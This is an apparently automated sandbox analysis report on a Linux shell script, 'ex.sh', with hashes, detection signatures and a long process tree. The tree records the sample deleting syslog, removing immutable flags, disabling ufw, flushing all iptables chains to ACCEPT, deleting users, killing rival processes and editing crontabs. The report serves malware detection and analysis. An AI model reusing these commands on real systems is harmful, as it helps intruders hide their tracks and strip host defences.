Analysis
max time kernel: 127s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20221125-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20221125-en, kernel:4.15.0-161-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 05/06/2023, 20:37
Static task: static1
Behavioral task: behavioral1 | Sample: ex.sh | Resource: ubuntu1804-amd64-20221125-en
Behavioral task: behavioral2 | Sample: ex.sh | Resource: debian9-armhf-en-20211208
Behavioral task: behavioral3 | Sample: ex.sh | Resource: debian9-mipsbe-20221111-en
Behavioral task: behavioral4 | Sample: ex.sh | Resource: debian9-mipsel-20221125-en
General
Target: ex.sh
Size: 33KB
MD5: 64cee920fe0de7406b82e77d2a050643
SHA1: 4b9f0472a54a14fb88b67ce15d5771ee59c634eb
SHA256: 3859228f749da18c65d0dab3f5efa45485967db2751a5a5ca604d06e5ff0607b
SHA512: 5bfc29d014ed5746c015cf4e3695020e66192810227edfd589ab358022df0f8d25d24cd04aa3c3650f47fe6c8fcbe3a4bf05995f484fc8a259678755e8459320
SSDEEP: 384:aAC6+7pQwKL//OMHDf6jlpTWg3vMGQiirhv6R+wMeWGj4CC9vEKMvU/4Qdre21j/:S7LzQ5VFNcDAFLcIwgnoYq0xFBrHtguz
Malware Config
Signatures
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
description | ioc | Process
File deleted | /var/log/syslog | rm
Flushes firewall rules 2 IoCs
Flushes/disables firewall rules inside the Linux kernel.
pid | Process
810 | iptables
634 | ufw
ioc | pid | Process
/lib/modules/4.15.0-161-generic/kernel/net/ipv6/netfilter/ip6_tables.ko | 642 | modprobe
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
Creates/modifies Cron job 1 TTPs 11 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description | ioc | Process
File opened for modification | /var/spool/cron/crontabs/tmp.J8yewm | crontab
File opened for modification | /var/spool/cron/crontabs/tmp.WG2lZt | crontab
File opened for modification | /var/spool/cron/crontabs/tmp.wMIKTv | crontab
File opened for modification | /var/spool/cron/crontabs/tmp.ukMU4u | crontab
File opened for modification | /var/spool/cron/crontabs/tmp.DVIMPx | crontab
File opened for modification | /var/spool/cron/crontabs/tmp.i7Znqh | crontab
File opened for modification | /var/spool/cron/crontabs/tmp.PUs9sp | crontab
File opened for modification | /var/spool/cron/crontabs/tmp.5z7fCn | crontab
File opened for modification | /var/spool/cron/crontabs/tmp.mxGZmr | crontab
File opened for modification | /var/spool/cron/crontabs/tmp.5BZ5bt | crontab
File opened for modification | /var/spool/cron/crontabs/tmp.v3WrHB | crontab
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 49 IoCs
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description | ioc | Process
File opened for reading | /sys/module/x_tables/initstate | modprobe
File opened for reading | /sys/module/ip6_tables/initstate | modprobe
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description | ioc | Process
File opened for modification | /tmp/log_rot | ex.sh
Processes
/tmp/ex.sh | /tmp/ex.sh | 1⤵ | PID:628 | [Writes file to tmp directory]
/bin/rm | rm -rf /var/log/syslog | 2⤵ | PID:629 | [Deletes system logs]
/usr/bin/chattr | chattr -iua /tmp/ | 2⤵ | PID:630 | [Attempts to change immutable files]
/usr/bin/chattr | chattr -iua /var/tmp/ | 2⤵ | PID:631 | [Attempts to change immutable files]
/usr/bin/chattr | chattr -R -i /var/spool/cron | 2⤵ | PID:632 | [Attempts to change immutable files]
/usr/bin/chattr | chattr -i /etc/crontab | 2⤵ | PID:633 | [Attempts to change immutable files]
/usr/sbin/ufw | ufw disable | 2⤵ | PID:634 | [Flushes firewall rules]
/sbin/iptables | /sbin/iptables -V | 3⤵ | PID:635
/lib/ufw/ufw-init | /lib/ufw/ufw-init force-stop | 3⤵ | PID:640 | [Attempts to change immutable files]
/sbin/ip6tables | ip6tables -L INPUT -n | 4⤵ | PID:641
/sbin/modprobe | /sbin/modprobe ip6_tables | 5⤵ | PID:642 | [Loads a kernel module; Enumerates kernel/hardware configuration]
/sbin/iptables | iptables -F ufw-logging-deny | 4⤵ | PID:646
/sbin/iptables | iptables -F ufw-logging-allow | 4⤵ | PID:649
/sbin/iptables | iptables -F ufw-not-local | 4⤵ | PID:650
/sbin/iptables | iptables -F ufw-user-logging-input | 4⤵ | PID:651 | [Attempts to change immutable files]
/sbin/iptables | iptables -F ufw-user-limit-accept | 4⤵ | PID:652
/sbin/iptables | iptables -F ufw-user-limit | 4⤵ | PID:653
/sbin/iptables | iptables -F ufw-skip-to-policy-input | 4⤵ | PID:654
/sbin/iptables | iptables -F ufw-reject-input | 4⤵ | PID:655 | [Attempts to change immutable files]
/sbin/iptables | iptables -F ufw-after-logging-input | 4⤵ | PID:656 | [Attempts to change immutable files]
/sbin/iptables | iptables -F ufw-after-input | 4⤵ | PID:657 | [Attempts to change immutable files]
/sbin/iptables | iptables -F ufw-user-input | 4⤵ | PID:658
/sbin/iptables | iptables -F ufw-before-input | 4⤵ | PID:659 | [Attempts to change immutable files]
/sbin/iptables | iptables -F ufw-before-logging-input | 4⤵ | PID:660 | [Attempts to change immutable files]
/sbin/iptables | iptables -F ufw-skip-to-policy-forward | 4⤵ | PID:661
/sbin/iptables | iptables -F ufw-reject-forward | 4⤵ | PID:662
/sbin/iptables | iptables -F ufw-after-logging-forward | 4⤵ | PID:663
/sbin/iptables | iptables -F ufw-after-forward | 4⤵ | PID:664
/sbin/iptables | iptables -F ufw-user-logging-forward | 4⤵ | PID:665
/sbin/iptables | iptables -F ufw-user-forward | 4⤵ | PID:666
/sbin/iptables | iptables -F ufw-before-forward | 4⤵ | PID:667
/sbin/iptables | iptables -F ufw-before-logging-forward | 4⤵ | PID:668
/sbin/iptables | iptables -F ufw-track-forward | 4⤵ | PID:669
/sbin/iptables | iptables -F ufw-track-output | 4⤵ | PID:670
/sbin/iptables | iptables -F ufw-track-input | 4⤵ | PID:671 | [Attempts to change immutable files]
/sbin/iptables | iptables -F ufw-skip-to-policy-output | 4⤵ | PID:672
/sbin/iptables | iptables -F ufw-reject-output | 4⤵ | PID:673
/sbin/iptables | iptables -F ufw-after-logging-output | 4⤵ | PID:674
/sbin/iptables | iptables -F ufw-after-output | 4⤵ | PID:675
/sbin/iptables | iptables -F ufw-user-logging-output | 4⤵ | PID:676
/sbin/iptables | iptables -F ufw-user-output | 4⤵ | PID:677
/sbin/iptables | iptables -F ufw-before-output | 4⤵ | PID:678
/sbin/iptables | iptables -F ufw-before-logging-output | 4⤵ | PID:679
/sbin/iptables | iptables -Z ufw-logging-deny | 4⤵ | PID:680
/sbin/iptables | iptables -Z ufw-logging-allow | 4⤵ | PID:681
/sbin/iptables | iptables -Z ufw-not-local | 4⤵ | PID:682
/sbin/iptables | iptables -Z ufw-user-logging-input | 4⤵ | PID:683 | [Attempts to change immutable files]
/sbin/iptables | iptables -Z ufw-user-limit-accept | 4⤵ | PID:684
/sbin/iptables | iptables -Z ufw-user-limit | 4⤵ | PID:685
/sbin/iptables | iptables -Z ufw-skip-to-policy-input | 4⤵ | PID:686
/sbin/iptables | iptables -Z ufw-reject-input | 4⤵ | PID:687 | [Attempts to change immutable files]
/sbin/iptables | iptables -Z ufw-after-logging-input | 4⤵ | PID:688 | [Attempts to change immutable files]
/sbin/iptables | iptables -Z ufw-after-input | 4⤵ | PID:689
/sbin/iptables | iptables -Z ufw-user-input | 4⤵ | PID:690 | [Attempts to change immutable files]
/sbin/iptables | iptables -Z ufw-before-input | 4⤵ | PID:691 | [Attempts to change immutable files]
/sbin/iptables | iptables -Z ufw-before-logging-input | 4⤵ | PID:692
/sbin/iptables | iptables -Z ufw-skip-to-policy-forward | 4⤵ | PID:693
/sbin/iptables | iptables -Z ufw-reject-forward | 4⤵ | PID:694
/sbin/iptables | iptables -Z ufw-after-logging-forward | 4⤵ | PID:695
/sbin/iptables | iptables -Z ufw-after-forward | 4⤵ | PID:696
/sbin/iptables | iptables -Z ufw-user-logging-forward | 4⤵ | PID:697
/sbin/iptables | iptables -Z ufw-user-forward | 4⤵ | PID:698
/sbin/iptables | iptables -Z ufw-before-forward | 4⤵ | PID:699
/sbin/iptables | iptables -Z ufw-before-logging-forward | 4⤵ | PID:700
/sbin/iptables | iptables -Z ufw-track-forward | 4⤵ | PID:701
/sbin/iptables | iptables -Z ufw-track-output | 4⤵ | PID:702
/sbin/iptables | iptables -Z ufw-track-input | 4⤵ | PID:703 | [Attempts to change immutable files]
/sbin/iptables | iptables -Z ufw-skip-to-policy-output | 4⤵ | PID:704
/sbin/iptables | iptables -Z ufw-reject-output | 4⤵ | PID:705
/sbin/iptables | iptables -Z ufw-after-logging-output | 4⤵ | PID:706
/sbin/iptables | iptables -Z ufw-after-output | 4⤵ | PID:707
/sbin/iptables | iptables -Z ufw-user-logging-output | 4⤵ | PID:708
/sbin/iptables | iptables -Z ufw-user-output | 4⤵ | PID:709
/sbin/iptables | iptables -Z ufw-before-output | 4⤵ | PID:710
/sbin/iptables | iptables -Z ufw-before-logging-output | 4⤵ | PID:711
/sbin/iptables | iptables -X ufw-logging-deny | 4⤵ | PID:712
/sbin/iptables | iptables -X ufw-logging-allow | 4⤵ | PID:713
/sbin/iptables | iptables -X ufw-not-local | 4⤵ | PID:714
/sbin/iptables | iptables -X ufw-user-logging-input | 4⤵ | PID:715 | [Attempts to change immutable files]
/sbin/iptables | iptables -X ufw-user-logging-output | 4⤵ | PID:716
/sbin/iptables | iptables -X ufw-user-logging-forward | 4⤵ | PID:717
/sbin/iptables | iptables -X ufw-user-limit-accept | 4⤵ | PID:718
/sbin/iptables | iptables -X ufw-user-limit | 4⤵ | PID:719
/sbin/iptables | iptables -X ufw-user-input | 4⤵ | PID:720
/sbin/iptables | iptables -X ufw-user-forward | 4⤵ | PID:721
/sbin/iptables | iptables -X ufw-user-output | 4⤵ | PID:722
/sbin/iptables | iptables -X ufw-skip-to-policy-input | 4⤵ | PID:723 | [Attempts to change immutable files]
/sbin/iptables | iptables -X ufw-skip-to-policy-output | 4⤵ | PID:724
/sbin/iptables | iptables -X ufw-skip-to-policy-forward | 4⤵ | PID:725
/sbin/iptables | iptables -P INPUT ACCEPT | 4⤵ | PID:726
/sbin/iptables | iptables -P OUTPUT ACCEPT | 4⤵ | PID:727
/sbin/iptables | iptables -P FORWARD ACCEPT | 4⤵ | PID:728
/sbin/ip6tables | ip6tables -F ufw6-logging-deny | 4⤵ | PID:729
/sbin/ip6tables | ip6tables -F ufw6-logging-allow | 4⤵ | PID:730
/sbin/ip6tables | ip6tables -F ufw6-not-local | 4⤵ | PID:731
/sbin/ip6tables | ip6tables -F ufw6-user-logging-input | 4⤵ | PID:732 | [Attempts to change immutable files]
/sbin/ip6tables | ip6tables -F ufw6-user-limit-accept | 4⤵ | PID:733
/sbin/ip6tables | ip6tables -F ufw6-user-limit | 4⤵ | PID:734
/sbin/ip6tables | ip6tables -F ufw6-skip-to-policy-input | 4⤵ | PID:735
/sbin/ip6tables | ip6tables -F ufw6-reject-input | 4⤵ | PID:736
/sbin/ip6tables | ip6tables -F ufw6-after-logging-input | 4⤵ | PID:737 | [Attempts to change immutable files]
/sbin/ip6tables | ip6tables -F ufw6-after-input | 4⤵ | PID:738
/sbin/ip6tables | ip6tables -F ufw6-user-input | 4⤵ | PID:739 | [Attempts to change immutable files]
/sbin/ip6tables | ip6tables -F ufw6-before-input | 4⤵ | PID:740 | [Attempts to change immutable files]
/sbin/ip6tables | ip6tables -F ufw6-before-logging-input | 4⤵ | PID:741 | [Attempts to change immutable files]
/sbin/ip6tables | ip6tables -F ufw6-skip-to-policy-forward | 4⤵ | PID:742
/sbin/ip6tables | ip6tables -F ufw6-reject-forward | 4⤵ | PID:743
/sbin/ip6tables | ip6tables -F ufw6-after-logging-forward | 4⤵ | PID:744
/sbin/ip6tables | ip6tables -F ufw6-after-forward | 4⤵ | PID:745
/sbin/ip6tables | ip6tables -F ufw6-user-logging-forward | 4⤵ | PID:746
/sbin/ip6tables | ip6tables -F ufw6-user-forward | 4⤵ | PID:747
/sbin/ip6tables | ip6tables -F ufw6-before-forward | 4⤵ | PID:748
/sbin/ip6tables | ip6tables -F ufw6-before-logging-forward | 4⤵ | PID:749
/sbin/ip6tables | ip6tables -F ufw6-track-forward | 4⤵ | PID:750
/sbin/ip6tables | ip6tables -F ufw6-track-output | 4⤵ | PID:751
/sbin/ip6tables | ip6tables -F ufw6-track-input | 4⤵ | PID:752 | [Attempts to change immutable files]
/sbin/ip6tables | ip6tables -F ufw6-skip-to-policy-output | 4⤵ | PID:753
/sbin/ip6tables | ip6tables -F ufw6-reject-output | 4⤵ | PID:754
/sbin/ip6tables | ip6tables -F ufw6-after-logging-output | 4⤵ | PID:755
/sbin/ip6tables | ip6tables -F ufw6-after-output | 4⤵ | PID:756
/sbin/ip6tables | ip6tables -F ufw6-user-logging-output | 4⤵ | PID:757
/sbin/ip6tables | ip6tables -F ufw6-user-output | 4⤵ | PID:758
/sbin/ip6tables | ip6tables -F ufw6-before-output | 4⤵ | PID:759
/sbin/ip6tables | ip6tables -F ufw6-before-logging-output | 4⤵ | PID:760
/sbin/ip6tables | ip6tables -Z ufw6-logging-deny | 4⤵ | PID:761
/sbin/ip6tables | ip6tables -Z ufw6-logging-allow | 4⤵ | PID:762
/sbin/ip6tables | ip6tables -Z ufw6-not-local | 4⤵ | PID:763
/sbin/ip6tables | ip6tables -Z ufw6-user-logging-input | 4⤵ | PID:764 | [Attempts to change immutable files]
/sbin/ip6tables | ip6tables -Z ufw6-user-limit-accept | 4⤵ | PID:765
/sbin/ip6tables | ip6tables -Z ufw6-user-limit | 4⤵ | PID:766
/sbin/ip6tables | ip6tables -Z ufw6-skip-to-policy-input | 4⤵ | PID:767 | [Attempts to change immutable files]
/sbin/ip6tables | ip6tables -Z ufw6-reject-input | 4⤵ | PID:768 | [Attempts to change immutable files]
/sbin/ip6tables | ip6tables -Z ufw6-after-logging-input | 4⤵ | PID:769
/sbin/ip6tables | ip6tables -Z ufw6-after-input | 4⤵ | PID:770 | [Attempts to change immutable files]
/sbin/ip6tables | ip6tables -Z ufw6-user-input | 4⤵ | PID:771 | [Attempts to change immutable files]
/sbin/ip6tables | ip6tables -Z ufw6-before-input | 4⤵ | PID:772 | [Attempts to change immutable files]
/sbin/ip6tables | ip6tables -Z ufw6-before-logging-input | 4⤵ | PID:773 | [Attempts to change immutable files]
/sbin/ip6tables | ip6tables -Z ufw6-skip-to-policy-forward | 4⤵ | PID:774
/sbin/ip6tables | ip6tables -Z ufw6-reject-forward | 4⤵ | PID:775
/sbin/ip6tables | ip6tables -Z ufw6-after-logging-forward | 4⤵ | PID:776
/sbin/ip6tables | ip6tables -Z ufw6-after-forward | 4⤵ | PID:777
/sbin/ip6tables | ip6tables -Z ufw6-user-logging-forward | 4⤵ | PID:778
/sbin/ip6tables | ip6tables -Z ufw6-user-forward | 4⤵ | PID:779
/sbin/ip6tables | ip6tables -Z ufw6-before-forward | 4⤵ | PID:780
/sbin/ip6tables | ip6tables -Z ufw6-before-logging-forward | 4⤵ | PID:781
/sbin/ip6tables | ip6tables -Z ufw6-track-forward | 4⤵ | PID:782
/sbin/ip6tables | ip6tables -Z ufw6-track-output | 4⤵ | PID:783
/sbin/ip6tables | ip6tables -Z ufw6-track-input | 4⤵ | PID:784 | [Attempts to change immutable files]
/sbin/ip6tables | ip6tables -Z ufw6-skip-to-policy-output | 4⤵ | PID:785
/sbin/ip6tables | ip6tables -Z ufw6-reject-output | 4⤵ | PID:786
/sbin/ip6tables | ip6tables -Z ufw6-after-logging-output | 4⤵ | PID:787
/sbin/ip6tables | ip6tables -Z ufw6-after-output | 4⤵ | PID:788
/sbin/ip6tables | ip6tables -Z ufw6-user-logging-output | 4⤵ | PID:789
/sbin/ip6tables | ip6tables -Z ufw6-user-output | 4⤵ | PID:790
/sbin/ip6tables | ip6tables -Z ufw6-before-output | 4⤵ | PID:791
/sbin/ip6tables | ip6tables -Z ufw6-before-logging-output | 4⤵ | PID:792
/sbin/ip6tables | ip6tables -X ufw6-logging-deny | 4⤵ | PID:793
/sbin/ip6tables | ip6tables -X ufw6-logging-allow | 4⤵ | PID:794
/sbin/ip6tables | ip6tables -X ufw6-not-local | 4⤵ | PID:795
/sbin/ip6tables | ip6tables -X ufw6-user-logging-input | 4⤵ | PID:796 | [Attempts to change immutable files]
/sbin/ip6tables | ip6tables -X ufw6-user-logging-output | 4⤵ | PID:797
/sbin/ip6tables | ip6tables -X ufw6-user-logging-forward | 4⤵ | PID:798
/sbin/ip6tables | ip6tables -X ufw6-user-limit-accept | 4⤵ | PID:799
/sbin/ip6tables | ip6tables -X ufw6-user-limit | 4⤵ | PID:800
/sbin/ip6tables | ip6tables -X ufw6-user-input | 4⤵ | PID:801
/sbin/ip6tables | ip6tables -X ufw6-user-forward | 4⤵ | PID:802
/sbin/ip6tables | ip6tables -X ufw6-user-output | 4⤵ | PID:803
/sbin/ip6tables | ip6tables -X ufw6-skip-to-policy-input | 4⤵ | PID:804 | [Attempts to change immutable files]
/sbin/ip6tables | ip6tables -X ufw6-skip-to-policy-output | 4⤵ | PID:805
/sbin/ip6tables | ip6tables -X ufw6-skip-to-policy-forward | 4⤵ | PID:806
/sbin/ip6tables | ip6tables -P INPUT ACCEPT | 4⤵ | PID:807
/sbin/ip6tables | ip6tables -P OUTPUT ACCEPT | 4⤵ | PID:808
/sbin/ip6tables | ip6tables -P FORWARD ACCEPT | 4⤵ | PID:809
/sbin/iptables | iptables -F | 2⤵ | PID:810 | [Flushes firewall rules]
/usr/bin/sudo | sudo sysctl "kernel.nmi_watchdog=0" | 2⤵ | PID:811
/sbin/sysctl | sysctl "kernel.nmi_watchdog=0" | 3⤵ | PID:812
/usr/sbin/userdel | userdel akay | 2⤵ | PID:813
/usr/sbin/userdel | userdel vfinder | 2⤵ | PID:814
/usr/bin/chattr | chattr -iae /root/.ssh/ | 2⤵ | PID:815 | [Attempts to change immutable files]
/usr/bin/chattr | chattr -iae /root/.ssh/authorized_keys | 2⤵ | PID:816
/bin/rm | rm -rf "/tmp/addres*" | 2⤵ | PID:817
/bin/rm | rm -rf "/tmp/walle*" | 2⤵ | PID:818
/bin/rm | rm -rf /tmp/keys | 2⤵ | PID:819
/bin/ps | ps aux | 2⤵ | PID:820 | [Reads CPU attributes; Reads runtime system information]
/bin/grep | grep /dot | 2⤵ | PID:821
/bin/grep | grep -v grep | 2⤵ | PID:822
/usr/bin/awk | awk "{print \$2}" | 2⤵ | PID:823
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:824 | [Attempts to change immutable files]
/usr/bin/pkill | pkill -f hezb | 2⤵ | PID:825 | [Reads CPU attributes]
/bin/ps | ps aux | 2⤵ | PID:826 | [Reads CPU attributes; Reads runtime system information]
/bin/grep | grep tracepath | 2⤵ | PID:827
/bin/grep | grep -v grep | 2⤵ | PID:828
/usr/bin/awk | awk "{print \$2}" | 2⤵ | PID:829
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:830 | [Attempts to change immutable files]
/usr/bin/pkill | pkill -f /tmp/.out | 2⤵ | PID:831 | [Reads CPU attributes; Reads runtime system information]
/bin/ps | ps aux | 2⤵ | PID:832 | [Reads CPU attributes; Reads runtime system information]
/bin/grep | grep ./ll1 | 2⤵ | PID:833
/bin/grep | grep -v grep | 2⤵ | PID:834
/usr/bin/awk | awk "{print \$2}" | 2⤵ | PID:835
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:836 | [Attempts to change immutable files]
/bin/ps | ps aux | 2⤵ | PID:837 | [Reads CPU attributes; Reads runtime system information]
/bin/grep | grep -i "[a]liyun" | 2⤵ | PID:838 | [Attempts to change immutable files]
/bin/ps | ps aux | 2⤵ | PID:839 | [Reads CPU attributes]
/bin/grep | grep -i "[y]unjing" | 2⤵ | PID:840 | [Attempts to change immutable files]
/bin/grep | grep 185.71.65.238 | 2⤵ | PID:842
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:843
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:844
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:845 | [Attempts to change immutable files]
/bin/grep | grep 140.82.52.87 | 2⤵ | PID:847
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:848
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:849
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:850 | [Attempts to change immutable files]
/bin/grep | grep 207.38.87.6 | 2⤵ | PID:852
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:853
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:854
/bin/grep | grep -v - | 2⤵ | PID:855
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:856 | [Attempts to change immutable files]
/bin/grep | grep 34.81.218.76:9486 | 2⤵ | PID:858
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:859
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:860
/bin/grep | grep -v - | 2⤵ | PID:861
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:862
/bin/grep | grep 42.112.28.216:9486 | 2⤵ | PID:864
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:865
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:866
/bin/grep | grep -v - | 2⤵ | PID:867
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:868 | [Attempts to change immutable files]
/usr/bin/pkill | pkill -f .git/kthreaddw | 2⤵ | PID:869 | [Reads CPU attributes]
/bin/ps | ps aux | 2⤵ | PID:870 | [Reads CPU attributes; Reads runtime system information]
/bin/grep | grep agetty | 2⤵ | PID:871
/bin/grep | grep -v grep | 2⤵ | PID:872
/usr/bin/awk | awk "{if(\$3>80.0) print \$2}" | 2⤵ | PID:873
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:874 | [Attempts to change immutable files]
/usr/bin/pkill | pkill -f 42.112.28.216 | 2⤵ | PID:875 | [Reads CPU attributes; Reads runtime system information]
/usr/bin/crontab | crontab -l | 2⤵ | PID:876
/bin/sed | sed /192.81.212.13/d | 2⤵ | PID:877
/usr/bin/crontab | crontab - | 2⤵ | PID:878 | [Creates/modifies Cron job]
/usr/bin/crontab | crontab -l | 2⤵ | PID:879
/bin/sed | sed /base64/d | 2⤵ | PID:880
/usr/bin/crontab | crontab - | 2⤵ | PID:881 | [Creates/modifies Cron job]
/usr/bin/crontab | crontab -l | 2⤵ | PID:882
/bin/sed | sed /python/d | 2⤵ | PID:883
/usr/bin/crontab | crontab - | 2⤵ | PID:884 | [Creates/modifies Cron job]
/usr/bin/crontab | crontab -l | 2⤵ | PID:885
/bin/sed | sed /shm/d | 2⤵ | PID:886
/usr/bin/crontab | crontab - | 2⤵ | PID:887 | [Creates/modifies Cron job]
/usr/bin/crontab | crontab -l | 2⤵ | PID:888
/bin/sed | sed /postgresql/d | 2⤵ | PID:889
/usr/bin/crontab | crontab - | 2⤵ | PID:890 | [Creates/modifies Cron job]
/usr/bin/crontab | crontab -l | 2⤵ | PID:891
/bin/sed | sed /cloudfronts/d | 2⤵ | PID:892
/usr/bin/crontab | crontab - | 2⤵ | PID:893 | [Creates/modifies Cron job]
/usr/bin/crontab | crontab -l | 2⤵ | PID:894
/bin/sed | sed /sshd/d | 2⤵ | PID:895
/usr/bin/crontab | crontab - | 2⤵ | PID:896 | [Creates/modifies Cron job]
/usr/bin/crontab | crontab -l | 2⤵ | PID:897
/bin/sed | sed /linux/d | 2⤵ | PID:898
/usr/bin/crontab | crontab - | 2⤵ | PID:899 | [Creates/modifies Cron job]
/usr/bin/crontab | crontab -l | 2⤵ | PID:900
/bin/sed | sed /neoogilvy/d | 2⤵ | PID:901
/usr/bin/crontab | crontab - | 2⤵ | PID:902 | [Creates/modifies Cron job]
/usr/bin/crontab | crontab -l | 2⤵ | PID:903
/bin/sed | sed /rsync/d | 2⤵ | PID:904
/usr/bin/crontab | crontab - | 2⤵ | PID:905 | [Creates/modifies Cron job]
/usr/bin/crontab | crontab -l | 2⤵ | PID:906
/bin/sed | sed /bpdeliver/d | 2⤵ | PID:907
/usr/bin/crontab | crontab - | 2⤵ | PID:908 | [Creates/modifies Cron job]
/usr/bin/pkill | pkill -f sshd | 2⤵ | PID:909 | [Reads CPU attributes; Reads runtime system information]
/usr/bin/pkill | pkill -f htop | 2⤵ | PID:910 | [Reads CPU attributes; Reads runtime system information]
/usr/bin/pkill | pkill -f linuxsys | 2⤵ | PID:911 | [Reads CPU attributes]
/usr/bin/pkill | pkill -f kthreaddo | 2⤵ | PID:912 | [Reads CPU attributes; Reads runtime system information]
/usr/bin/pkill | pkill -f donkey | 2⤵ | PID:913 | [Reads CPU attributes; Reads runtime system information]
/bin/grep | grep :1414 | 2⤵ | PID:915
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:916
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:917
/bin/grep | grep -v - | 2⤵ | PID:918
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:919
/bin/grep | grep 127.0.0.1:52018 | 2⤵ | PID:921
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:922
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:923
/bin/grep | grep -v - | 2⤵ | PID:924
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:925 | [Attempts to change immutable files]
/bin/grep | grep :143 | 2⤵ | PID:927
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:928
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:929
/bin/grep | grep -v - | 2⤵ | PID:930
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:931
/bin/grep | grep :2222 | 2⤵ | PID:933
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:934
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:935
/bin/grep | grep -v - | 2⤵ | PID:936
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:937 | [Attempts to change immutable files]
/bin/grep | grep :3333 | 2⤵ | PID:939
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:940
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:941
/bin/grep | grep -v - | 2⤵ | PID:942
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:943
/bin/grep | grep :3389 | 2⤵ | PID:945
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:946
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:947
/bin/grep | grep -v - | 2⤵ | PID:948
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:949 | [Attempts to change immutable files]
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:952
/bin/grep | grep :4444 | 2⤵ | PID:951
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:953
/bin/grep | grep -v - | 2⤵ | PID:954
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:955 | [Attempts to change immutable files]
/bin/grep | grep :5555 | 2⤵ | PID:957
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:958
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:959
/bin/grep | grep -v - | 2⤵ | PID:960
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:961 | [Attempts to change immutable files]
/bin/grep | grep :6666 | 2⤵ | PID:963
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:964
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:965
/bin/grep | grep -v - | 2⤵ | PID:966
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:967 | [Attempts to change immutable files]
/bin/grep | grep :6665 | 2⤵ | PID:969
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:970
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:971
/bin/grep | grep -v - | 2⤵ | PID:972
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:973 | [Attempts to change immutable files]
/bin/grep | grep :6667 | 2⤵ | PID:975
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:976
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:977
/bin/grep | grep -v - | 2⤵ | PID:978
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:979 | [Attempts to change immutable files]
/bin/grep | grep :7777 | 2⤵ | PID:981
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:982
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:983
/bin/grep | grep -v - | 2⤵ | PID:984
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:985
/bin/grep | grep :8444 | 2⤵ | PID:987
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:988
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:989
/bin/grep | grep -v - | 2⤵ | PID:990
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:991 | [Attempts to change immutable files]
